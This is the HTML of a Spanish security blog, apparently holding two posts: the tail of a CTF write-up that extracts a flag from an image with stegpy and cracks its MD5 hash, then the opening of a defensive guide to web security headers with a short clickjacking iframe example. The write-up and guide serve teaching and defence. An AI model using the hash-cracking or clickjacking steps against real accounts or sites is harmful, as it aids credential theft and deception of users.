gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> /usr/</span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">local</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">/lib/python3.7/dist-packages (from cffi!=1.11.3,>=1.8->cryptography->stegpy) (2.19)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Installing collected packages: stegpy</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Successfully installed stegpy-0.0.1</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego/_samurai.png.extracted</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># cd ..</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/hc0n2020/stego</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># stegpy samurai.png -p</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Enter password (will not be echoed):</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">H-c0n{3899dcbab79f92af727c2190bbd8abc5}</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/Crypto/MD5-Cracker</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># buster -s 3899dcbab79f92af727c2190bbd8abc5</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">_ _ ____ ____ _ _ ___ _ _ ____ ___ ____ ____</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">|__| |__| [__ |__| |__] | | [__ | |___ |__/</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">| | | | ___] | | |__] |__| ___] | |___ | \ v3.0</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">[!] Hash </span><span style="background-color: #1e1e1e; color: #569cd6; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">function</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> : MD5</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ninja</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Y ahí está la flag es: H-c0n{3899dcbab79f92af727c2190bbd8abc5}</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: #cccccc; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 294px; overflow: hidden; width: 300px;"><img height="294" src="https://lh3.googleusercontent.com/DjBSn698VKgxKmNWe-S09RUJ4d45cWeeZ18O2qhKoR-xaFBadoUoDlkGMmG-W6EL1Gs_CCodSw6VLLSs05frxuN80E2f-NfjNbPIeErxKKgI-0wz4kOJT6e5shWhpNBTL4362mD9" style="margin-left: 0px; margin-top: 0px;" width="300" /></span></span></div>
<br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Autor: 1v4n a.k.a. @1r0Dm48O</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Twitter: </span><a href="https://twitter.com/1r0Dm448O" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://twitter.com/1r0Dm48O</span></a></div>
Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0Embalse de Alcorlo, 19243, Guadalajara, Spain41.022516 -3.025077840.974601500000006 -3.1057588000000003 41.0704305 -2.9443968tag:blogger.com,1999:blog-4789894782637921835.post-51881116346520243842020-02-04T15:08:00.006+01:002020-02-04T16:50:44.697+01:00Cómo configurar las cabeceras de seguridad en servicios web y no morir en el intento.<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="127" src="https://lh4.googleusercontent.com/21LVfoQGqolVMP41nQ5msdujcWV4aG0KuTs03pdD0IJ9fOKXOK9zS_9MHqFCJTUtJUAv6T2CIOYvPOSvEKs4STP3JqKvPV0OiImsqfcTA3eHonV0huyzGWVHRn1n5WgEJO4_KUY" style="margin-left: 0px; margin-top: 0px; text-align: center;" width="640" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt; white-space: pre-wrap;">Autor: @db3rn4l</span></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Este es mi primer artículo en solitario en HoneySec, espero que os guste y sobretodo que os sirva.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Últimamente, mi compañero Raúl Renales y yo, nos hemos encontrado con vulnerabilidades asociadas a la </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ausencia de configuración de las cabeceras de seguridad en los servicios web, concretamente Apache2, httpd e IIS.</span><br />
<span style="font-family: "calibri" , sans-serif; font-size: 11pt; white-space: pre;"><br /></span>
<span style="font-family: "calibri" , sans-serif; font-size: 11pt; white-space: pre;">El motivo principal de realizar este artículo es que hay una gran cantidad de portales web que se encuentran en</span><br />
<span style="font-family: "calibri" , sans-serif; font-size: 11pt; white-space: pre;"> esta situación. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"></span></div>
<a name='more'></a>Realmente configurar los servicios para obtener dichas cabeceras es muy sencillo, pero encontrar información, en la que se indique claramente cómo se realizan estas configuraciones, es un dolor.<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Si lanzamos escaneos mediante herramientas automatizadas como por ejemplo OWASP ZAP, podemos obtener </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">notificaciones de detección de vulnerabilidades como por ejemplo las que se muestran en las siguientes </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">imágenes:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 113px; overflow: hidden; width: 567px;"><img height="113" src="https://lh4.googleusercontent.com/21LVfoQGqolVMP41nQ5msdujcWV4aG0KuTs03pdD0IJ9fOKXOK9zS_9MHqFCJTUtJUAv6T2CIOYvPOSvEKs4STP3JqKvPV0OiImsqfcTA3eHonV0huyzGWVHRn1n5WgEJO4_KUY" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 199px; overflow: hidden; width: 567px;"><img height="199" src="https://lh4.googleusercontent.com/YQo4j_ahYQR9C1ig-ymew71gFCGeG7NCYFiZHWe6_SR79FzDbKhiWhQZC7Rf5C9mp0_D-2FgUlerjuu9jX_p6FD7n3VT1NP9UGlKSrdHoqjive3nqHsU9v18KTa53aPI_Mi9Zok" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 161px; overflow: hidden; width: 567px;"><img height="161" src="https://lh3.googleusercontent.com/3nP8JVAx_G8okViXmhA4KXKIuQ36hRnYy6yvTSLNCvIzl8GYAa7inLFBB1in7Pq_obnKE7gXMwsXhK_Cely4Qj8xOjnEsOxyQufaCOvdFarPG604Psh9j3yZuGmvKwJv-V9FP8o" style="margin-left: 0px; margin-top: 0px;" width="567" /></span></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Pero antes de continuar debemos entender qué son las cabeceras de seguridad en servicios web.</span></div>
<h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: #2e75b5; font-family: "calibri" , sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">¿Qué son las cabeceras de seguridad?</span></h1>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Cuando un usuario accede a una página web desde su navegador, realiza una petición http o https a un servidor</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> que almacena la página web solicitada, a continuación el servidor web responde a dicha petición, ofreciendo el</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> contenido de la página web junto con una serie de cabeceras para que el navegador web del cliente pueda </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">interpretar ese contenido de forma correcta.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Estas cabeceras ofrecidas, son usadas por servidor y navegador para el envío de la información.</span></div>
<h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 12pt;">
<span style="background-color: transparent; color: #2e75b5; font-family: "calibri" , sans-serif; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">¿Cuáles son las cabeceras de seguridad más importantes? </span></h1>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Las cabeceras más importantes en los sistemas web son: </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>X-XSS-Protection:</b></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Esta cabecera protege a los clientes de ser atacados mediante un XSS reflejado.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>X-Frame-Options:</b></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Esta cabecera se establece para proteger a los clientes web contra ataques de clickjacking. Este ataque, se </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">puede replicar de una manera sencilla por parte de los delincuentes, que crean sus propias páginas web </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">incluyendo un iframe llamando a una página web lícita, de esta forma:</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> <iframe src="https://bancodelavíctima.es"></iframe>. </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Mediante esta cabecera, se prohíbe que nadie pueda cargar el sitio protegido en ningún otro lugar.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>X-Content-Type-Options:</b></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Este encabezado, añadiéndole el parámetro “nosniff”, impide que navegadores como Internet Explorer y </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Chrome no carguen las hojas de estilos, ni los JavaScripts que no tengan un Myme-Type adecuado. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Strict-Transport-Security:</b></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> O como más se le conoce HSTS. Estableciendo esta cabecera, se le indica al navegador del usuario que se </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">conecte al sitio web utilizando https en vez de http. El servidor forzará a los usuarios a usar https, incluso si </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">se especifica la conexión hacia http.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Content-Security-Policy:</b></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Esta cabecera permite definir una lista blanca de fuentes de contenido usadas por la plataforma web. Esta </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">cabecera es una buena contramedida para evitar ataques XSS, restringiendo que un navegador pueda cargar en</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> el sitio web elementos externos como JavaScript, CSS, etc. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<b><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Referrer-Policy:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></b><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Mediante esta cabecera, se protege la navegación del usuario y se preserva su privacidad. Si se establece esta </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">cabecera, se evita que otras páginas web puedan saber desde dónde han accedido los visitantes. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Feature-Policy:</b></span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Configurando este encabezado se puede definir qué funciones del navegador se permiten o se deniegan desde </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">el propio dominio o desde cualquier otro contenido, como por ejemplo en el caso de establecer un </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><iframe></iframe>.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<b><span style="background-color: transparent; color: #1e4d78; font-family: "calibri" , sans-serif; font-size: 12pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Access-Control-Allow-Origin:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></b><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">El encabezado Access-Control-Allow-Origin se incluye en la respuesta de un sitio web a una solicitud que se </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">origina en otro sitio web, e identifica el origen permitido de la solicitud. Un navegador web compara </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Access-Control-Allow-Origin con el origen del sitio web solicitante y permite el acceso a la respuesta si coinciden</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt; white-space: pre;">. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Un servidor devuelve este encabezado cuando un sitio web solicita un recurso entre dominios, con un </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">encabezado Origin agregado por el navegador.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Vamos a ejemplificarlo: </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Primero un sitio web que tiene como origen pagina1.honeysec.info provoca la siguiente solicitud de dominio </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">cruzado:</span></div>
<div class="MsoNormal">
<b id="docs-internal-guid-4cf61b3e-7fff-5113-1acb-9b3f36d31b9b" style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 1pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GET /data HTTP/1.1</span></div>
<div dir="ltr" style="border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 4pt 8pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Host: pagina2.honeysec.info</span></div>
<div dir="ltr" style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; padding: 0pt 4pt 1pt 4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Origen: https://pagina1.honeysec.info</span></div>
